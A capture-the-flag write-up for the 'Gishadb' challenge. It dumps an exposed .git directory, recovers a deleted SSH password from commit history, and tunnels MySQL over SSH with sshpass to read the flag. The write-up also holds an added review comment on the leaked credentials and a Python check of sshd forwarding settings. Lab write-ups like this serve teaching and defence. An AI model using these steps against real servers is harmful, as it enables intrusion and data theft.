@xl00t
Created October 22, 2023 12:39

Gishadb - 481

16 Solves

This server listens on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh

Author: Penthium2 (BZHack)

A git repository is exposed on the web server:

$ curl https://gishadb.flag4all.sh/.git/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /.git</title>
 </head>
 <body>
<h1>Index of /.git</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="COMMIT_EDITMSG">COMMIT_EDITMSG</a></td><td align="right">2023-05-25 12:53  </td><td align="right"> 24 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="HEAD">HEAD</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 23 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="branches/">branches/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="config">config</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 92 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="description">description</a></td><td align="right">2023-05-25 12:43  </td><td align="right"> 73 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="hooks/">hooks/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="index">index</a></td><td align="right">2023-05-25 12:53  </td><td align="right">217 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="info/">info/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="logs/">logs/</a></td><td align="right">2023-05-25 12:44  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="objects/">objects/</a></td><td align="right">2023-05-25 12:53  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="refs/">refs/</a></td><td align="right">2023-05-25 12:43  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.56 (Debian) Server at gishadb.flag4all.sh Port 80</address>
</body></html>

So we dump it.

$ git-dumper https://gishadb.flag4all.sh/ git
$ cd git
$ git log
commit cfdccf9472e0b985abc372f90fa64352d744b5ad (HEAD -> master)
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:53:28 2023 +0200

    suppresion info preprod

commit 13c0faef33bf466602913bc3918094cfefea072f
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:52:44 2023 +0200

    ajout info ssh pour preprod

commit 6dbcaf8c22bbe74aa2562ac60f58602d8592347a
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:50:32 2023 +0200

    sécurisation

commit 02ef7e50a0bb9954d7819f8fd7c7b2c593db0d73
Author: penthium2 <penthium2@hotmail.fr>
Date:   Thu May 25 14:44:03 2023 +0200

    ipremier commit
(END)

$ git diff 13c0faef33bf466602913bc3918094cfefea072f
diff --git a/info_login b/info_login
deleted file mode 100644
index d904e9b..0000000
--- a/info_login
+++ /dev/null
@@ -1,2 +0,0 @@
-loginssh : gishadb@192.168.124.1
-pass : iop
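
Review bot: The two removed lines in `info_login` (`loginssh : ...` and `pass : iop`) are a plaintext SSH login, and deleting the file in a follow-up commit does not retract it: the blob stays reachable from commit 13c0faef33bf466602913bc3918094cfefea072f. Treat the password as disclosed and rotate it, then rewrite history to drop the file rather than relying on this deletion.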

Trying to log in over SSH just gets our terminal spammed.

So we local-port-forward MySQL to our loopback interface and keep enumerating with the credentials found in config.php:

<?php
$cnx = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8', 'app', 'db_Super_P4$$');
?>

Pane 1: sshpass -p 'iop' ssh -p 222 -L 3306:127.0.0.1:3306 -N gishadb@gishadb.flag4all.sh

Pane 2:

$ mysql -h 127.0.0.1 -u app -p app
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 47176
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [app]> show tables;
+---------------+
| Tables_in_app |
+---------------+
| hand          |
| users         |
+---------------+
2 rows in set (0.018 sec)

MariaDB [app]> select * from users;
+----+----------+-----------+-----------------------+
| id | lastname | firstname | email                 |
+----+----------+-----------+-----------------------+
|  1 | Deux     | Penthium  | penthium2@flag4all.sh |
+----+----------+-----------+-----------------------+
1 row in set (0.016 sec)

MariaDB [app]> select * from hand;
+----+-----------------------------+----------+
| id | finger                      | ring     |
+----+-----------------------------+----------+
|  1 | pouce                       | Penthium |
|  2 | index                       | Penthium |
|  3 | FLAG{TAK3_Care_Of_SSH_POWA} | Penthium |
|  4 | anulaire                    | Penthium |
|  5 | oriculaire                  | Penthium |
+----+-----------------------------+----------+
5 rows in set (0.016 sec)

MariaDB [app]> 

ggwp
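
Added example, not part of the original write-up: the noisy login did not stop `ssh -N -L`, because sshd decides on forwarding independently of the command or shell it runs for the session. The code below resolves the effective sshd_config keywords for one account and reports whether local TCP forwarding is still honoured. Assumptions: both config samples and the ForceCommand path are constructed, and only `Match All` and `Match User` criteria are interpreted.

```python
from fnmatch import fnmatch

# Constructed sshd_config samples; the ForceCommand path is hypothetical and
# stands in for whatever floods the terminal on an interactive login.
WEAK = """\
Port 222
Match User gishadb
    ForceCommand /usr/local/bin/noisy-banner
"""
HARDENED = WEAK + """\
    AllowTcpForwarding no
    PermitOpen none
    PermitTTY no
"""

def effective_settings(config_text, user):
    """Resolve sshd keywords for `user`. Match blocks override the global
    section and the first value seen for a keyword wins. Assumption: only
    'Match All' and 'Match User <patterns>' are understood; any other
    criterion is treated as not matching."""
    global_opts, match_opts = {}, {}
    target = global_opts
    for raw in config_text.splitlines():
        parts = raw.strip().split(None, 1)
        if not parts or parts[0].startswith("#"):
            continue
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            crit = value.split()
            is_all = [c.lower() for c in crit] == ["all"]
            is_user = (len(crit) == 2 and crit[0].lower() == "user"
                       and any(fnmatch(user, p) for p in crit[1].split(",")))
            target = match_opts if (is_all or is_user) else None
        elif target is not None:
            target.setdefault(key, value)
    return {**global_opts, **match_opts}

def local_forward_allowed(config_text, user):
    """True if a client request such as `ssh -N -L ...` would be granted."""
    s = effective_settings(config_text, user)
    if s.get("disableforwarding", "no").lower() == "yes":
        return False
    if s.get("permitopen", "any").lower() == "none":
        return False
    # sshd defaults to AllowTcpForwarding yes when the keyword is absent.
    return s.get("allowtcpforwarding", "yes").lower() in ("yes", "all", "local")
```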
